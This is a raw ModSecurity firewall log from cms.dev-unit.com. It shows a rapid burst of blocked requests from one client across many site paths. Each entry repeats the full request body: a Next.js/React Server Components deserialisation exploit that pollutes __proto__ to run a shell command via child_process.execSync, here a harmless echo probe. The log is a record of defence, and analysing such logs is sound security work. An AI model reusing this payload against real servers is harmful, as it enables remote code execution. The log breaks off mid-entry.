{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1kI7AjfUQYCN-J7D-AAAAMc"] [Sun Apr 05 15:42:46.685080 2026] [:error] [pid 1503:tid 1514] [client 172.94.9.253:38140] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm1kI7AjfUQYCN-J7D-QAAAMU"] [Sun Apr 05 15:42:46.700683 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:38130] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1pc83uMXRUE9zvQTowAAAcM"] [Sun Apr 05 15:42:46.732654 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:38150] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1rxQSOrq_iRTM7dq5wAAAQI"] [Sun Apr 05 15:42:46.740405 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:38160] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJm1pc83uMXRUE9zvQTpQAAAc0"] [Sun Apr 05 15:42:46.751051 2026] [:error] [pid 13019:tid 13261] [client 172.94.9.253:38098] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJm1rxQSOrq_iRTM7dq4wAAARU"] [Sun Apr 05 15:42:46.767931 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:38172] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1rxQSOrq_iRTM7dq5QAAAQQ"] [Sun Apr 05 15:42:46.769721 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:38180] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJm1rxQSOrq_iRTM7dq5gAAARg"] [Sun Apr 05 15:42:46.794681 2026] [:error] [pid 31198:tid 31274] [client 172.94.9.253:38192] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJm1jT5TgrBR8xRnfXBOgAAAVY"] [Sun Apr 05 15:42:46.804952 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:38202] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJm1rxQSOrq_iRTM7dq6QAAAQs"] [Sun Apr 05 15:42:46.812478 2026] [:error] [pid 23077:tid 23103] [client 172.94.9.253:38152] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJm1pc83uMXRUE9zvQTpgAAAdQ"] [Sun Apr 05 15:42:46.816711 2026] [:error] [pid 13019:tid 13248] [client 172.94.9.253:38198] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm1rxQSOrq_iRTM7dq6gAAAQg"] [Sun Apr 05 15:42:46.816840 2026] [:error] [pid 13019:tid 13263] [client 172.94.9.253:38206] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1rxQSOrq_iRTM7dq6wAAARc"] [Sun Apr 05 15:42:46.889653 2026] [:error] [pid 31198:tid 31264] [client 172.94.9.253:38236] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1jT5TgrBR8xRnfXBPAAAAUw"] [Sun Apr 05 15:42:46.903582 2026] [:error] [pid 23077:tid 23099] [client 172.94.9.253:38242] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJm1pc83uMXRUE9zvQTqgAAAdA"] [Sun Apr 05 15:42:46.904942 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:38256] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1rxQSOrq_iRTM7dq7QAAAQM"] [Sun Apr 05 15:42:46.922272 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:38216] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJm1pc83uMXRUE9zvQTqQAAAcY"] [Sun Apr 05 15:42:46.923241 2026] [:error] [pid 13019:tid 13241] [client 172.94.9.253:38218] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJm1rxQSOrq_iRTM7dq7gAAAQE"] [Sun Apr 05 15:42:46.947303 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:38260] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJm1pc83uMXRUE9zvQTqwAAAdc"] [Sun Apr 05 15:42:46.951072 2026] [:error] [pid 23077:tid 23102] [client 172.94.9.253:38298] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 